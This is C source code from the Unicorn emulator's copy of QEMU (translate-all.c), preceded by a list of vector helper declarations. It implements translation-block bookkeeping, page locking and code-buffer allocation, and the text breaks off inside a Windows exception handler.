TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_neg8, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_neg16, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_neg32, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_neg64, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_abs8, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_abs16, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_abs32, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_abs64, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_not, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_and, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_or, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_xor, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_andc, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_orc, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_nand, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_nor, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_eqv, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ands, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_xors, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_ors, TCG_CALL_NO_RWG, void, ptr, ptr, i64, i32) DEF_HELPER_FLAGS_3(gvec_shl8i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shl16i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shl32i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shl64i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shr8i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shr16i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shr32i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_shr64i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_sar8i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_sar16i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_sar32i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(gvec_sar64i, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shl8v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shl16v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shl32v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shl64v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shr8v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shr16v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shr32v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_shr64v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sar8v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sar16v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sar32v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sar64v, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_eq8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_eq16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_eq32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_eq64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ne8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ne16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ne32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ne64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_lt8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_lt16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_lt32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_lt64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_le8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_le16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_le32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_le64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ltu8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ltu16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ltu32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ltu64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_leu8, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_leu16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_leu32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_leu64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_bitsel, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/accel/tcg/translate-all.c��������������������������������������������������������0000664�0000000�0000000�00000201614�14675241067�0020712�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Host code generation * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "qemu/units.h" #include "qemu-common.h" #define NO_CPU_IO_DEFS #include "cpu.h" #include "exec/exec-all.h" #include "tcg/tcg.h" #include "exec/ram_addr.h" #include "exec/cputlb.h" #include "exec/tb-hash.h" #include "translate-all.h" #include "qemu/bitmap.h" #include "qemu/timer.h" #include "sysemu/cpus.h" #include "sysemu/tcg.h" #include "uc_priv.h" static bool tb_exec_is_locked(struct uc_struct*); static void tb_exec_change(struct uc_struct*, bool locked); /* #define DEBUG_TB_INVALIDATE */ /* #define DEBUG_TB_FLUSH */ /* make various TB consistency checks */ /* #define DEBUG_TB_CHECK */ #ifdef DEBUG_TB_INVALIDATE #define DEBUG_TB_INVALIDATE_GATE 1 #else #define DEBUG_TB_INVALIDATE_GATE 0 #endif #ifdef DEBUG_TB_FLUSH #define DEBUG_TB_FLUSH_GATE 1 #else #define DEBUG_TB_FLUSH_GATE 0 #endif /* TB consistency checks only implemented for usermode emulation. */ #undef DEBUG_TB_CHECK #ifdef DEBUG_TB_CHECK #define DEBUG_TB_CHECK_GATE 1 #else #define DEBUG_TB_CHECK_GATE 0 #endif /* Access to the various translations structures need to be serialised via locks * for consistency. * In user-mode emulation access to the memory related structures are protected * with mmap_lock. * In !user-mode we use per-page locks. */ #define assert_memory_lock() #define SMC_BITMAP_USE_THRESHOLD 10 typedef struct PageDesc { /* list of TBs intersecting this ram page */ uintptr_t first_tb; /* in order to optimize self modifying code, we count the number of lookups we do to a given page to use a bitmap */ unsigned long *code_bitmap; unsigned int code_write_count; } PageDesc; /** * struct page_entry - page descriptor entry * @pd: pointer to the &struct PageDesc of the page this entry represents * @index: page index of the page * @locked: whether the page is locked * * This struct helps us keep track of the locked state of a page, without * bloating &struct PageDesc. * * A page lock protects accesses to all fields of &struct PageDesc. * * See also: &struct page_collection. */ struct page_entry { PageDesc *pd; tb_page_addr_t index; bool locked; }; /** * struct page_collection - tracks a set of pages (i.e. &struct page_entry's) * @tree: Binary search tree (BST) of the pages, with key == page index * @max: Pointer to the page in @tree with the highest page index * * To avoid deadlock we lock pages in ascending order of page index. * When operating on a set of pages, we need to keep track of them so that * we can lock them in order and also unlock them later. For this we collect * pages (i.e. &struct page_entry's) in a binary search @tree. Given that the * @tree implementation we use does not provide an O(1) operation to obtain the * highest-ranked element, we use @max to keep track of the inserted page * with the highest index. This is valuable because if a page is not in * the tree and its index is higher than @max's, then we can lock it * without breaking the locking order rule. * * Note on naming: 'struct page_set' would be shorter, but we already have a few * page_set_*() helpers, so page_collection is used instead to avoid confusion. * * See also: page_collection_lock(). */ struct page_collection { GTree *tree; struct page_entry *max; }; /* list iterators for lists of tagged pointers in TranslationBlock */ #define TB_FOR_EACH_TAGGED(head, tb, n, field) \ for (n = (head) & 1, tb = (TranslationBlock *)((head) & ~1); \ tb; tb = (TranslationBlock *)tb->field[n], n = (uintptr_t)tb & 1, \ tb = (TranslationBlock *)((uintptr_t)tb & ~1)) #define PAGE_FOR_EACH_TB(pagedesc, tb, n) \ TB_FOR_EACH_TAGGED((pagedesc)->first_tb, tb, n, page_next) #define TB_FOR_EACH_JMP(head_tb, tb, n) \ TB_FOR_EACH_TAGGED((head_tb)->jmp_list_head, tb, n, jmp_list_next) /* In system mode we want L1_MAP to be based on ram offsets, while in user mode we want it to be based on virtual addresses. */ #if HOST_LONG_BITS < TARGET_PHYS_ADDR_SPACE_BITS # define L1_MAP_ADDR_SPACE_BITS HOST_LONG_BITS #else # define L1_MAP_ADDR_SPACE_BITS TARGET_PHYS_ADDR_SPACE_BITS #endif /* Size of the L2 (and L3, etc) page tables. */ #define V_L2_BITS 10 #define V_L2_SIZE (1 << V_L2_BITS) /* Make sure all possible CPU event bits fit in tb->trace_vcpu_dstate */ QEMU_BUILD_BUG_ON(CPU_TRACE_DSTATE_MAX_EVENTS > sizeof_field(TranslationBlock, trace_vcpu_dstate) * BITS_PER_BYTE); /* The bottom level has pointers to PageDesc, and is indexed by * anything from 4 to (V_L2_BITS + 3) bits, depending on target page size. */ #define V_L1_MIN_BITS 4 #define V_L1_MAX_BITS (V_L2_BITS + 3) #define V_L1_MAX_SIZE (1 << V_L1_MAX_BITS) static void page_table_config_init(struct uc_struct *uc) { uint32_t v_l1_bits; assert(TARGET_PAGE_BITS); /* The bits remaining after N lower levels of page tables. */ v_l1_bits = (L1_MAP_ADDR_SPACE_BITS - TARGET_PAGE_BITS) % V_L2_BITS; if (v_l1_bits < V_L1_MIN_BITS) { v_l1_bits += V_L2_BITS; } uc->v_l1_size = 1 << v_l1_bits; uc->v_l1_shift = L1_MAP_ADDR_SPACE_BITS - TARGET_PAGE_BITS - v_l1_bits; uc->v_l2_levels = uc->v_l1_shift / V_L2_BITS - 1; assert(v_l1_bits <= V_L1_MAX_BITS); assert(uc->v_l1_shift % V_L2_BITS == 0); assert(uc->v_l2_levels >= 0); } /* Encode VAL as a signed leb128 sequence at P. Return P incremented past the encoded value. */ static uint8_t *encode_sleb128(uint8_t *p, target_long val) { int more, byte; do { byte = val & 0x7f; val >>= 7; more = !((val == 0 && (byte & 0x40) == 0) || (val == -1 && (byte & 0x40) != 0)); if (more) { byte |= 0x80; } *p++ = byte; } while (more); return p; } /* Decode a signed leb128 sequence at *PP; increment *PP past the decoded value. Return the decoded value. */ static target_long decode_sleb128(uint8_t **pp) { uint8_t *p = *pp; target_long val = 0; int byte, shift = 0; do { byte = *p++; val |= (target_ulong)(byte & 0x7f) << shift; shift += 7; } while (byte & 0x80); if (shift < TARGET_LONG_BITS && (byte & 0x40)) { #ifdef _MSC_VER val |= ((target_ulong)0 - 1) << shift; #else val |= -(target_ulong)1 << shift; #endif } *pp = p; return val; } /* Encode the data collected about the instructions while compiling TB. Place the data at BLOCK, and return the number of bytes consumed. The logical table consists of TARGET_INSN_START_WORDS target_ulong's, which come from the target's insn_start data, followed by a uintptr_t which comes from the host pc of the end of the code implementing the insn. Each line of the table is encoded as sleb128 deltas from the previous line. The seed for the first line is { tb->pc, 0..., tb->tc.ptr }. That is, the first column is seeded with the guest pc, the last column with the host pc, and the middle columns with zeros. */ static int encode_search(struct uc_struct *uc, TranslationBlock *tb, uint8_t *block) { TCGContext *tcg_ctx = uc->tcg_ctx; uint8_t *highwater = tcg_ctx->code_gen_highwater; uint8_t *p = block; int i, j, n; for (i = 0, n = tb->icount; i < n; ++i) { target_ulong prev; for (j = 0; j < TARGET_INSN_START_WORDS; ++j) { if (i == 0) { prev = (j == 0 ? tb->pc : 0); } else { prev = tcg_ctx->gen_insn_data[i - 1][j]; } p = encode_sleb128(p, tcg_ctx->gen_insn_data[i][j] - prev); } prev = (i == 0 ? 0 : tcg_ctx->gen_insn_end_off[i - 1]); p = encode_sleb128(p, tcg_ctx->gen_insn_end_off[i] - prev); /* Test for (pending) buffer overflow. The assumption is that any one row beginning below the high water mark cannot overrun the buffer completely. Thus we can test for overflow after encoding a row without having to check during encoding. */ if (unlikely(p > highwater)) { return -1; } } return p - block; } /* The cpu state corresponding to 'searched_pc' is restored. * When reset_icount is true, current TB will be interrupted and * icount should be recalculated. */ static int cpu_restore_state_from_tb(CPUState *cpu, TranslationBlock *tb, uintptr_t searched_pc, bool reset_icount) { target_ulong data[TARGET_INSN_START_WORDS] = { tb->pc }; uintptr_t host_pc = (uintptr_t)tb->tc.ptr; CPUArchState *env = cpu->env_ptr; uint8_t *p = (uint8_t *)tb->tc.ptr + tb->tc.size; int i, j, num_insns = tb->icount; searched_pc -= GETPC_ADJ; if (searched_pc < host_pc) { return -1; } /* Reconstruct the stored insn data while looking for the point at which the end of the insn exceeds the searched_pc. */ for (i = 0; i < num_insns; ++i) { for (j = 0; j < TARGET_INSN_START_WORDS; ++j) { data[j] += decode_sleb128(&p); } host_pc += decode_sleb128(&p); if (host_pc > searched_pc) { goto found; } } return -1; found: if (reset_icount && (tb_cflags(tb) & CF_USE_ICOUNT)) { /* Reset the cycle counter to the start of the block and shift if to the number of actually executed instructions */ cpu_neg(cpu)->icount_decr.u16.low += num_insns - i; } restore_state_to_opc(env, tb, data); return 0; } bool cpu_restore_state(CPUState *cpu, uintptr_t host_pc, bool will_exit) { TCGContext *tcg_ctx = cpu->uc->tcg_ctx; TranslationBlock *tb; bool r = false; uintptr_t check_offset; struct uc_struct *uc = cpu->uc; /* The host_pc has to be in the region of current code buffer. If * it is not we will not be able to resolve it here. The two cases * where host_pc will not be correct are: * * - fault during translation (instruction fetch) * - fault from helper (not using GETPC() macro) * * Either way we need return early as we can't resolve it here. * * We are using unsigned arithmetic so if host_pc < * tcg_init_ctx.code_gen_buffer check_offset will wrap to way * above the code_gen_buffer_size */ check_offset = host_pc - (uintptr_t) uc->tcg_ctx->code_gen_buffer; if (check_offset < uc->tcg_ctx->code_gen_buffer_size) { tb = tcg_tb_lookup(tcg_ctx, host_pc); if (tb) { cpu_restore_state_from_tb(cpu, tb, host_pc, will_exit); if (tb_cflags(tb) & CF_NOCACHE) { /* one-shot translation, invalidate it immediately */ tb_phys_invalidate(tcg_ctx, tb, -1); tcg_tb_remove(tcg_ctx, tb); } r = true; } } return r; } static void page_init(struct uc_struct *uc) { page_size_init(uc); page_table_config_init(uc); } static PageDesc *page_find_alloc(struct uc_struct *uc, tb_page_addr_t index, int alloc) { PageDesc *pd; void **lp; int i; /* Level 1. Always allocated. */ lp = uc->l1_map + ((index >> uc->v_l1_shift) & (uc->v_l1_size - 1)); /* Level 2..N-1. */ for (i = uc->v_l2_levels; i > 0; i--) { void **p = *lp; if (p == NULL) { void *existing; if (!alloc) { return NULL; } p = g_new0(void *, V_L2_SIZE); existing = *lp; if (*lp == NULL) { *lp = p; } if (unlikely(existing)) { g_free(p); p = existing; } } lp = p + ((index >> (i * V_L2_BITS)) & (V_L2_SIZE - 1)); } pd = *lp; if (pd == NULL) { void *existing; if (!alloc) { return NULL; } pd = g_new0(PageDesc, V_L2_SIZE); existing = *lp; if (*lp == NULL) { *lp = pd; } if (unlikely(existing)) { g_free(pd); pd = existing; } } return pd + (index & (V_L2_SIZE - 1)); } static inline PageDesc *page_find(struct uc_struct *uc, tb_page_addr_t index) { return page_find_alloc(uc, index, 0); } static void page_lock_pair(struct uc_struct *uc, PageDesc **ret_p1, tb_page_addr_t phys1, PageDesc **ret_p2, tb_page_addr_t phys2, int alloc); #ifdef CONFIG_DEBUG_TCG static void ht_pages_locked_debug_init(void) { if (ht_pages_locked_debug) { return; } ht_pages_locked_debug = g_hash_table_new(NULL, NULL); } static bool page_is_locked(const PageDesc *pd) { PageDesc *found; ht_pages_locked_debug_init(); found = g_hash_table_lookup(ht_pages_locked_debug, pd); return !!found; } static void page_lock__debug(PageDesc *pd) { ht_pages_locked_debug_init(); g_assert(!page_is_locked(pd)); g_hash_table_insert(ht_pages_locked_debug, pd, pd); } static void page_unlock__debug(const PageDesc *pd) { bool removed; ht_pages_locked_debug_init(); g_assert(page_is_locked(pd)); removed = g_hash_table_remove(ht_pages_locked_debug, pd); g_assert(removed); } static void do_assert_page_locked(const PageDesc *pd, const char *file, int line) { if (unlikely(!page_is_locked(pd))) { // error_report("assert_page_lock: PageDesc %p not locked @ %s:%d", // pd, file, line); abort(); // unreachable in unicorn. } } #define assert_page_locked(pd) do_assert_page_locked(pd, __FILE__, __LINE__) void assert_no_pages_locked(void) { ht_pages_locked_debug_init(); g_assert(g_hash_table_size(ht_pages_locked_debug) == 0); } #else /* !CONFIG_DEBUG_TCG */ #define assert_page_locked(pd) static inline void page_lock__debug(const PageDesc *pd) { } static inline void page_unlock__debug(const PageDesc *pd) { } #endif /* CONFIG_DEBUG_TCG */ static inline void page_lock(PageDesc *pd) { page_lock__debug(pd); } static inline void page_unlock(PageDesc *pd) { page_unlock__debug(pd); } /* lock the page(s) of a TB in the correct acquisition order */ static inline void page_lock_tb(struct uc_struct *uc, const TranslationBlock *tb) { page_lock_pair(uc, NULL, tb->page_addr[0], NULL, tb->page_addr[1], 0); } static inline void page_unlock_tb(struct uc_struct *uc, const TranslationBlock *tb) { PageDesc *p1 = page_find(uc, tb->page_addr[0] >> TARGET_PAGE_BITS); page_unlock(p1); if (unlikely(tb->page_addr[1] != -1)) { PageDesc *p2 = page_find(uc, tb->page_addr[1] >> TARGET_PAGE_BITS); if (p2 != p1) { page_unlock(p2); } } } #if 0 static inline struct page_entry * page_entry_new(PageDesc *pd, tb_page_addr_t index) { struct page_entry *pe = g_malloc(sizeof(*pe)); pe->index = index; pe->pd = pd; // pe->locked = false; return pe; } static void page_entry_destroy(gpointer p) { struct page_entry *pe = p; // g_assert(pe->locked); page_unlock(pe->pd); g_free(pe); } /* returns false on success */ static bool page_entry_trylock(struct page_entry *pe) { bool busy; busy = qemu_spin_trylock(&pe->pd->lock); if (!busy) { g_assert(!pe->locked); pe->locked = true; page_lock__debug(pe->pd); } return busy; } static void do_page_entry_lock(struct page_entry *pe) { page_lock(pe->pd); g_assert(!pe->locked); pe->locked = true; } static gboolean page_entry_lock(gpointer key, gpointer value, gpointer data) { struct page_entry *pe = value; do_page_entry_lock(pe); return FALSE; } static gboolean page_entry_unlock(gpointer key, gpointer value, gpointer data) { struct page_entry *pe = value; if (pe->locked) { pe->locked = false; page_unlock(pe->pd); } return FALSE; } /* * Trylock a page, and if successful, add the page to a collection. * Returns true ("busy") if the page could not be locked; false otherwise. */ static bool page_trylock_add(struct uc_struct *uc, struct page_collection *set, tb_page_addr_t addr) { tb_page_addr_t index = addr >> TARGET_PAGE_BITS; struct page_entry *pe; PageDesc *pd; pe = g_tree_lookup(set->tree, &index); if (pe) { return false; } pd = page_find(uc, index); if (pd == NULL) { return false; } pe = page_entry_new(pd, index); g_tree_insert(set->tree, &pe->index, pe); /* * If this is either (1) the first insertion or (2) a page whose index * is higher than any other so far, just lock the page and move on. */ if (set->max == NULL || pe->index > set->max->index) { set->max = pe; do_page_entry_lock(pe); return false; } /* * Try to acquire out-of-order lock; if busy, return busy so that we acquire * locks in order. */ return page_entry_trylock(pe); } static gint tb_page_addr_cmp(gconstpointer ap, gconstpointer bp, gpointer udata) { tb_page_addr_t a = *(const tb_page_addr_t *)ap; tb_page_addr_t b = *(const tb_page_addr_t *)bp; if (a == b) { return 0; } else if (a < b) { return -1; } return 1; } #endif /* * Lock a range of pages ([@start,@end[) as well as the pages of all * intersecting TBs. * Locking order: acquire locks in ascending order of page index. */ struct page_collection * page_collection_lock(struct uc_struct *uc, tb_page_addr_t start, tb_page_addr_t end) { #if 0 struct page_collection *set = g_malloc(sizeof(*set)); tb_page_addr_t index; PageDesc *pd; start >>= TARGET_PAGE_BITS; end >>= TARGET_PAGE_BITS; g_assert(start <= end); set->tree = g_tree_new_full(tb_page_addr_cmp, NULL, NULL, page_entry_destroy); set->max = NULL; assert_no_pages_locked(); retry: g_tree_foreach(set->tree, page_entry_lock, NULL); for (index = start; index <= end; index++) { TranslationBlock *tb; int n; pd = page_find(uc, index); if (pd == NULL) { continue; } if (page_trylock_add(uc, set, index << TARGET_PAGE_BITS)) { g_tree_foreach(set->tree, page_entry_unlock, NULL); goto retry; } assert_page_locked(pd); PAGE_FOR_EACH_TB(pd, tb, n) { if (page_trylock_add(uc, set, tb->page_addr[0]) || (tb->page_addr[1] != -1 && page_trylock_add(uc, set, tb->page_addr[1]))) { /* drop all locks, and reacquire in order */ g_tree_foreach(set->tree, page_entry_unlock, NULL); goto retry; } } } return set; #else return NULL; #endif } void page_collection_unlock(struct page_collection *set) { #if 0 /* entries are unlocked and freed via page_entry_destroy */ g_tree_destroy(set->tree); g_free(set); #endif } static void page_lock_pair(struct uc_struct *uc, PageDesc **ret_p1, tb_page_addr_t phys1, PageDesc **ret_p2, tb_page_addr_t phys2, int alloc) { PageDesc *p1, *p2; tb_page_addr_t page1; tb_page_addr_t page2; assert_memory_lock(); g_assert(phys1 != -1); page1 = phys1 >> TARGET_PAGE_BITS; page2 = phys2 >> TARGET_PAGE_BITS; p1 = page_find_alloc(uc, page1, alloc); if (ret_p1) { *ret_p1 = p1; } if (likely(phys2 == -1)) { page_lock(p1); return; } else if (page1 == page2) { page_lock(p1); if (ret_p2) { *ret_p2 = p1; } return; } p2 = page_find_alloc(uc, page2, alloc); if (ret_p2) { *ret_p2 = p2; } if (page1 < page2) { page_lock(p1); page_lock(p2); } else { page_lock(p2); page_lock(p1); } } /* Minimum size of the code gen buffer. This number is randomly chosen, but not so small that we can't have a fair number of TB's live. */ #define MIN_CODE_GEN_BUFFER_SIZE (1 * MiB) /* Maximum size of the code gen buffer we'd like to use. Unless otherwise indicated, this is constrained by the range of direct branches on the host cpu, as used by the TCG implementation of goto_tb. */ #if defined(__x86_64__) # define MAX_CODE_GEN_BUFFER_SIZE (2 * GiB) #elif defined(__sparc__) # define MAX_CODE_GEN_BUFFER_SIZE (2 * GiB) #elif defined(__powerpc64__) # define MAX_CODE_GEN_BUFFER_SIZE (2 * GiB) #elif defined(__powerpc__) # define MAX_CODE_GEN_BUFFER_SIZE (32 * MiB) #elif defined(__aarch64__) # define MAX_CODE_GEN_BUFFER_SIZE (2 * GiB) #elif defined(__s390x__) /* We have a +- 4GB range on the branches; leave some slop. */ # define MAX_CODE_GEN_BUFFER_SIZE (3 * GiB) #elif defined(__mips__) /* We have a 256MB branch region, but leave room to make sure the main executable is also within that region. */ # define MAX_CODE_GEN_BUFFER_SIZE (128 * MiB) #else # define MAX_CODE_GEN_BUFFER_SIZE ((size_t)-1) #endif #if TCG_TARGET_REG_BITS == 32 #define DEFAULT_CODE_GEN_BUFFER_SIZE_1 (32 * MiB) #else /* TCG_TARGET_REG_BITS == 64 */ /* * We expect most system emulation to run one or two guests per host. * Users running large scale system emulation may want to tweak their * runtime setup via the tb-size control on the command line. */ #define DEFAULT_CODE_GEN_BUFFER_SIZE_1 (1 * GiB) #endif #define DEFAULT_CODE_GEN_BUFFER_SIZE \ (DEFAULT_CODE_GEN_BUFFER_SIZE_1 < MAX_CODE_GEN_BUFFER_SIZE \ ? DEFAULT_CODE_GEN_BUFFER_SIZE_1 : MAX_CODE_GEN_BUFFER_SIZE) static inline size_t size_code_gen_buffer(size_t tb_size) { /* Size the buffer. */ if (tb_size == 0) { tb_size = DEFAULT_CODE_GEN_BUFFER_SIZE; } if (tb_size < MIN_CODE_GEN_BUFFER_SIZE) { tb_size = MIN_CODE_GEN_BUFFER_SIZE; } if (tb_size > MAX_CODE_GEN_BUFFER_SIZE) { tb_size = MAX_CODE_GEN_BUFFER_SIZE; } return tb_size; } #ifdef __mips__ /* In order to use J and JAL within the code_gen_buffer, we require that the buffer not cross a 256MB boundary. */ static inline bool cross_256mb(void *addr, size_t size) { return ((uintptr_t)addr ^ ((uintptr_t)addr + size)) & ~0x0ffffffful; } /* We weren't able to allocate a buffer without crossing that boundary, so make do with the larger portion of the buffer that doesn't cross. Returns the new base of the buffer, and adjusts code_gen_buffer_size. */ static inline void *split_cross_256mb(TCGContext *tcg_ctx, void *buf1, size_t size1) { void *buf2 = (void *)(((uintptr_t)buf1 + size1) & ~0x0ffffffful); size_t size2 = buf1 + size1 - buf2; size1 = buf2 - buf1; if (size1 < size2) { size1 = size2; buf1 = buf2; } tcg_ctx->code_gen_buffer_size = size1; return buf1; } #endif #ifdef USE_STATIC_CODE_GEN_BUFFER static uint8_t static_code_gen_buffer[DEFAULT_CODE_GEN_BUFFER_SIZE] __attribute__((aligned(CODE_GEN_ALIGN))); static inline void *alloc_code_gen_buffer(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; void *buf = static_code_gen_buffer; void *end = static_code_gen_buffer + sizeof(static_code_gen_buffer); size_t size; /* page-align the beginning and end of the buffer */ buf = QEMU_ALIGN_PTR_UP(buf, uc->qemu_real_host_page_size); end = QEMU_ALIGN_PTR_DOWN(end, uc->qemu_real_host_page_size); size = end - buf; /* Honor a command-line option limiting the size of the buffer. */ if (size > tcg_ctx->code_gen_buffer_size) { size = QEMU_ALIGN_DOWN(tcg_ctx->code_gen_buffer_size, uc->qemu_real_host_page_size); } tcg_ctx->code_gen_buffer_size = size; #ifdef __mips__ if (cross_256mb(buf, size)) { buf = split_cross_256mb(tcg_ctx, buf, size); size = tcg_ctx->code_gen_buffer_size; } #endif if (qemu_mprotect_rwx(buf, size)) { abort(); } qemu_madvise(buf, size, QEMU_MADV_HUGEPAGE); return buf; } #elif defined(_WIN32) #define COMMIT_COUNT (1024) // Commit 4MB per exception #define CLOSURE_SIZE (4096) #ifdef _WIN64 static LONG code_gen_buffer_handler(PEXCEPTION_POINTERS ptr, struct uc_struct *uc) #else /* The first two DWORD or smaller arguments that are found in the argument list from left to right are passed in ECX and EDX registers; all other arguments are passed on the stack from right to left. */ static LONG __fastcall code_gen_buffer_handler(PEXCEPTION_POINTERS ptr, struct uc_struct* uc) #endif { PEXCEPTION_RECORD record = ptr->ExceptionRecord; if (record->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) { uint8_t* base = (uint8_t*)(record->ExceptionInformation[1]); uint8_t* left = uc->tcg_ctx->initial_buffer; uint8_t* right = left + uc->tcg_ctx->initial_buffer_size; if (left && base >= left && base < right) { // It's our region uint8_t* base_end = base + COMMIT_COUNT * 4096; uint32_t size = COMMIT_COUNT * 4096; if 